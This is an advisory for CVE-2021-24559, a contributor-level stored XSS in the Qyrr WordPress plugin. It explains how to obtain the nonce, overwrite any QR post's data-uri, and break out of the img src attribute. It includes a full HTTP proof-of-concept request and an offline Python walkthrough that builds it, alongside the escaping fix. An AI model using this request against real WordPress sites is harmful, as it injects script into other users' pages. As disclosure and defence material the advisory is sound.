Authenticated contributor account needed to exploit Stored XSS vulnerability in QR WordPress plugin
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
CVE | CVE-2021-24559 | 16 Jan 2024 16:15 | – | cve |
NVD | CVE-2021-24559 | 16 Jan 2024 16:15 | – | nvd |
WPVulnDB | Qyrr < 0.7 - Authenticated (contributor+) Stored XSS | 26 Jul 2021 00:00 | – | wpvulndb |
Prion | Cross site scripting | 16 Jan 2024 16:15 | – | prion |
Cvelist | CVE-2021-24559 Qyrr < 0.7 - Authenticated (contributor+) Stored XSS | 16 Jan 2024 15:48 | – | cvelist |
To exploit this vulnerability the attacker needs, at minimum, an account with the 'edit_posts' capability (e.g. a contributor). That account is required to obtain a nonce, which is the only protection on the affected AJAX function.
To obtain the nonce, the attacker requests "<your host here>/wp-admin/edit.php?post_type=qr". The nonce is embedded in an inline script with the id "qyrr-admin-js-extra".
The same script lists the exploitable QR posts (post_id is the ID of the post whose meta data carries the meta key 'data-uri'). The AJAX handler does not check whether the requesting user owns that QR post, so a contributor can overwrite the QR code of any post, including those published by an administrator.
The third required parameter is data-uri, which carries the stored JavaScript. On request processing, data-uri is sanitized with sanitize_text_field(), but it is not escaped when output in the src attribute of the QR code image. sanitize_text_field() strips tags and trims whitespace, yet leaves double quotes untouched, so a value that closes the src attribute and adds an event handler survives intact; the payload therefore avoids tags entirely. The correct defence is escaping on output (esc_attr() or esc_url() for the attribute value) in addition to sanitizing on input.
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94
Connection: close
Cookie: [contributor+]

action=data_uri_to_meta&nonce=d5c0a0e3fa&post_id=1238&data-uri=+%22+onerror%3Dalert(1)+e%3D%22
```
Then open the page or post where the QR code is embedded to trigger the XSS: the stored value is rendered as src="" onerror=alert(1) e="", the empty src fails to load, and the onerror handler fires.
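The three steps above (read the nonce and post list from the edit.php page, build the admin-ajax.php request, and see why the stored value breaks out of the src attribute), as an added offline Python walkthrough that is not part of this advisory or of the Qyrr plugin. No requests are sent. The inline script sample is constructed for this example: only the element id "qyrr-admin-js-extra" and the nonce/post_id values come from the advisory, while the JavaScript variable name and the "nonce"/"posts" keys are assumptions. approx_sanitize_text_field() is a stand-in for the relevant behaviour of WordPress's sanitize_text_field(), and html.escape() stands in for PHP's esc_attr(); neither is the WordPress code.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlencode

# Constructed sample of the localized inline script on
# /wp-admin/edit.php?post_type=qr.  Variable name and the "nonce"/"posts"
# keys are assumptions for this example, not the plugin's real output.
SAMPLE_EDIT_PAGE = """
<html><body>
<script id="qyrr-admin-js-extra">
var qyrr_admin = {"nonce":"d5c0a0e3fa","posts":[1238,1240]};
</script>
</body></html>
"""

SCRIPT_RE = re.compile(
    r'<script[^>]*\bid="qyrr-admin-js-extra"[^>]*>(.*?)</script>', re.S)

# The advisory's PoC payload, URL-decoded.  It carries no tag (tags are
# stripped); instead it closes the src attribute, injects onerror=, and the
# trailing e=" swallows the template's own closing quote.
PAYLOAD = ' " onerror=alert(1) e="'


def _script_body(page: str) -> str:
    m = SCRIPT_RE.search(page)
    if not m:
        raise ValueError("qyrr-admin-js-extra script not found")
    return m.group(1)


def extract_nonce(page: str) -> str:
    """Step 1: the AJAX nonce from the localized script block."""
    n = re.search(r'"nonce"\s*:\s*"([0-9a-f]{10})"', _script_body(page))
    if not n:
        raise ValueError("nonce not found")
    return n.group(1)


def extract_post_ids(page: str) -> list[int]:
    """Step 2: QR post IDs from the same block; any may be targeted
    because the handler never checks ownership."""
    p = re.search(r'"posts"\s*:\s*\[([^\]]*)\]', _script_body(page))
    if not p:
        raise ValueError("post list not found")
    return [int(x) for x in p.group(1).split(",") if x.strip()]


def build_ajax_body(nonce: str, post_id: int, data_uri: str = PAYLOAD) -> str:
    """Step 3: form body of the POST to /wp-admin/admin-ajax.php."""
    params = [("action", "data_uri_to_meta"), ("nonce", nonce),
              ("post_id", post_id), ("data-uri", data_uri)]
    # safe="()" keeps alert(1) readable, matching the advisory's request
    return urlencode(params, safe="()")


def approx_sanitize_text_field(value: str) -> str:
    """Approximation (not WP code) of what sanitize_text_field() does to
    this input: script/style blocks and tags removed, whitespace collapsed
    and trimmed, double quotes left alone."""
    value = re.sub(r"<(script|style)[^>]*?>.*?</\1>", "", value,
                   flags=re.S | re.I)
    value = re.sub(r"<[^>]*>", "", value)
    value = re.sub(r"[\r\n\t ]+", " ", value)
    return value.strip()


def render_vulnerable(stored: str) -> str:
    """Stored meta value dropped straight into src, as in Qyrr < 0.7."""
    return '<img src="' + stored + '" alt="QR Code">'


def render_fixed(stored: str) -> str:
    """Escaped on output; html.escape(quote=True) stands in for esc_attr()."""
    return '<img src="' + html.escape(stored, quote=True) + '" alt="QR Code">'


class _ImgAttrs(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.names: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.names.extend(name for name, _ in attrs)


def img_attribute_names(markup: str) -> list[str]:
    """Attribute names a browser would see on the <img>; an 'onerror'
    entry means the payload escaped the attribute value."""
    p = _ImgAttrs()
    p.feed(markup)
    return p.names


if __name__ == "__main__":
    nonce = extract_nonce(SAMPLE_EDIT_PAGE)
    target = extract_post_ids(SAMPLE_EDIT_PAGE)[0]
    print("POST body :", build_ajax_body(nonce, target))
    stored = approx_sanitize_text_field(PAYLOAD)
    for label, markup in (("vulnerable", render_vulnerable(stored)),
                          ("fixed     ", render_fixed(stored))):
        print(label, ":", markup, img_attribute_names(markup))
```

Run as-is to see the exact request body from the advisory reproduced and, underneath, the two renderings: the unescaped one yields an <img> with a real onerror attribute, the escaped one keeps the whole payload inside the src value. Feeding a tag-based payload such as <img src=x onerror=alert(1)> into approx_sanitize_text_field() returns an empty string, which is why the advisory's payload relies on attribute breakout rather than on a tag.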